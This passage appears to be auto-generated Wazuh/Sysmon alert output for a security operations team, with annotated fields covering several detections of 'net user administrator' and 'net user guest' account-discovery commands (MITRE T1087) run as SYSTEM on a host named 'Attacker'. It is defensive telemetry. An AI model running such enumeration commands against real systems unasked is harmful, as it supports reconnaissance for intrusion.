No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc9-680a-b80a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11604
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:55.946+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:55.946+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534215.1012577
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.2509434Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282303
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.246 ProcessGuid: {94294ddc-bcca-680a-bb0a-000000000e00} ProcessId: 4340 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.246
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-bb0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:56.016+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:56.016+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534216.1017856
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.3699637Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282306
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.361 ProcessGuid: {94294ddc-bcca-680a-bd0a-000000000e00} ProcessId: 15012 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcca-680a-bb0a-000000000e00} ParentProcessId: 4340 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user administrator ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.361
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-bd0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15012
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcca-680a-bb0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4340
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:56.041+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:56.041+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534216.1022997
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.4155645Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282309
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.411 ProcessGuid: {94294ddc-bcca-680a-be0a-000000000e00} ProcessId: 4344 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.411
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-be0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4344
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:56.073+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:56.073+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534216.1028244
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:54.6519336Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282313
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:54.645 ProcessGuid: {94294ddc-bcca-680a-c00a-000000000e00} ProcessId: 8816 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user guest CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcca-680a-be0a-000000000e00} ParentProcessId: 4344 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user guest ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:54.645
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcca-680a-c00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8816
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 user guest
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
